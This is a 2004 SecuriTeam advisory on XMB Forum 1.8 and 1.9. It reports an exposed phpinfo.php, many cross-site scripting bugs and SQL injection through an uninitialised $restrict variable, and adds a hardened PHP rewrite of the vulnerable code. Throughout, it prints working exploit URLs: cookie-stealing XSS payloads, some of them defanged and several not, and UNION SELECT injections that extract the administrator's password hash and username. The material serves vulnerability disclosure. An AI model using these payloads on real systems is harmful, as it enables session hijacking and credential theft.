[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04

    To: list@securiteam.com
    Date: 30 Mar 2004 13:13:19 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

    Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.xmbforum.com/> XMB Forum is "a free web-based bulletin board
    system written in PHP with a MySQL backend."

    Multiple vulnerabilities have been found in XMB including several
    cross-site scripting bugs, SQL injections and information disclosure.

    DETAILS

    Vulnerable Systems:
     * XMB version 1.8 Partagium SP3
     * XMB version 1.9 Nexus beta

    PHP and web server information disclosure
    Beginning with the new Nexus release of XMB, a file named phpinfo.php has
    been added to the forum package. The original code, reproduced below, reveals
    the PHP version and information about the web server to anyone who requests it:

    <?php
    /* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
    phpinfo();
    ?>

    Not only can any user access phpinfo(); there is also a possible cross-site
    scripting vulnerability. An example follows:
    http://localhost/xmb19beta/phpinfo.php?foobar=>alert(document.cookie);</scr!pt>

    Note that the SCRIPT tag has been replaced with SCR!PT.

    Cross site scripting
    http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=a!ert(document.cookie);>

    Note: Log out before issuing the request, otherwise it will not work. The
    alert action was replaced with a!ert. Another cross-site scripting
    vulnerability exists in editprofile.php (only the latest version, 1.9, is
    vulnerable). An example request that exploits it:
    http://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader= onload=alert(document.cookie);>

    A cross site scripting bug exists in u2u.php as well. An example would be:
    http://localhost/xmb19beta/u2u.php?folder=foobar"><body onload=a!ert(document.cookie);>

    And in the stats.php file there is more than one cross site scripting bug
    due to uninitialized variables ($viewmost,$replymost,$latest). Examples:
    http://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body onload=a!ert(document.cookie);>

    Another XSS bug exists in post.php, where the $message and $icons variables
    are uninitialized.

    Examples:
    http://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/post.php?action=newthread&fid=1&icons= onload=a!ert(document.cookie);>

    In the forumdisplay.php script there are also uninitialized variables
    which open the way for cross site scripting. These are
    $threadlist,$pagelinks,$forumlist,$navigation and $forumdisplay:
    http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist= onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks= onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist= onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation= onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay= onload=a!ert(document.cookie);>

    SQL Injection and cross site scripting
    http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp= onload=a!ert(document.cookie);>

    Note: It will only work when no user is logged on, otherwise the $tpp
    variable will be overridden.

    An SQL injection and a cross-site scripting bug exist in member.php (only
    version 1.9 is vulnerable). Here is a snippet of code, starting at line 461,
    that shows the bug:

    // Note: $restrict is never initialised before this switch, and the cases
    // fall through on purpose (a lower status accumulates every clause below it).
    switch($self['status']){
        case 'member';
            $restrict .= " f.private !='3' AND";

        case 'Moderator';

        case 'Super Moderator';
            $restrict .= " f.private != '2' AND";

        case 'Administrator';
            $restrict .= " f.userlist = '' AND f.password = '' AND";

        case 'Super Administrator';
            break;

        default:
            $restrict .= " f.private !='3' AND f.private != '2' AND f.userlist = '' AND f.password = '' AND";
            break;
    }

    It is easily discernible that the $restrict variable is not initialized
    and hence opens up an SQL injection:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

    Or a cross-site scripting if one wishes:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= onload=a!ert(document.cookie);>

    Better yet, it's possible to retrieve the admin's MD5 password hash from
    the database in the following manner:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*

    Or the admin's username:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT username, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
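    As an added example (not XMB's code, and not the vendor's fix), here is the
    restriction builder quoted above rewritten so that $restrict cannot be
    supplied from outside the script: it is initialised before any use, the
    status is mapped through a fixed table instead of relying on case
    fall-through, and the member name reaches the query only as a bound
    parameter. The clauses produced per status are the same as in the original
    chain. The table and column names not quoted in the advisory (xmb_forums,
    xmb_posts, p.author) and the shape of the query are assumptions.

```php
<?php
// Added example, not XMB's code. Hardened form of the member.php restriction
// builder: $restrict is initialised before use, the status value is mapped
// through a fixed table, and user input reaches SQL only as a bound parameter.

// Privilege rank per status. Unknown statuses map to rank 0 (most restricted),
// which matches the original switch's default branch.
const STATUS_RANK = [
    'member'              => 1,
    'Moderator'           => 2,
    'Super Moderator'     => 2,
    'Administrator'       => 3,
    'Super Administrator' => 4,
];

// Builds the WHERE fragment limiting which forums a user of $status may see.
// Same clauses as the original fall-through chain, spelled out per rank so the
// result is obvious; every fragment is a constant string.
function forum_restriction(string $status): string
{
    $restrict = '';   // the fix: a request parameter can no longer supply it
    $rank = STATUS_RANK[$status] ?? 0;
    if ($rank < 2) {  // members and unknown statuses
        $restrict .= " f.private != '3' AND";
    }
    if ($rank < 3) {  // moderators and below
        $restrict .= " f.private != '2' AND";
    }
    if ($rank < 4) {  // everyone except super administrators
        $restrict .= " f.userlist = '' AND f.password = '' AND";
    }
    return $restrict;
}

// Returns [sql, params] for a per-forum post count of one member. The table
// names xmb_forums/xmb_posts and the column p.author are assumptions for this
// illustration. Execute with a prepared statement (e.g. PDO::prepare and
// PDOStatement::execute($params)); $member is never pasted into the SQL text.
function build_viewpro_query(string $status, string $member): array
{
    $sql = 'SELECT p.fid, COUNT(*) AS posts'
         . ' FROM xmb_posts p, xmb_forums f'
         . ' WHERE' . forum_restriction($status)
         . ' p.fid = f.fid AND p.author = ?'
         . ' GROUP BY p.fid';
    return [$sql, [$member]];
}

if (PHP_SAPI === 'cli') {
    foreach (['member', 'Moderator', 'Administrator', 'Super Administrator', 'bogus'] as $status) {
        printf("%-20s =>%s\n", $status, forum_restriction($status));
    }
    // A member name containing a quote travels in the parameter list, not in the
    // SQL string, so it cannot change the statement's structure.
    [$sql, $params] = build_viewpro_query('member', "o'brien");
    echo $sql, "\n", json_encode($params), "\n";
}
```

    Running it prints the five restriction fragments (the bogus status gets the
    same three clauses as a member, as the original default branch did) followed
    by a query whose only placeholder is the member name. The initialisation of
    $restrict is the one-line change that closes the injection shown above; the
    bound parameter addresses the separate risk of the member name itself being
    interpolated into the statement.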

    Yet more SQL injections and XSS vulnerabilities exist, this time in the
    misc.php script (only version 1.9 is vulnerable). Examples follow:
    http://localhost/xmb19beta/misc.php?action=search&restrict= onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/misc.php?action=search&restrict= private=-99 UNION SELECT null, null,password, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,null FROM xmb_members WHERE uid=1 LIMIT 1 /*

    Another SQL injection and XSS bug exists in today.php; again, only version
    1.9 is vulnerable:
    http://localhost/xmb19beta/today.php?restrict= onload=alert(document.cookie);>

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
    Vind.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

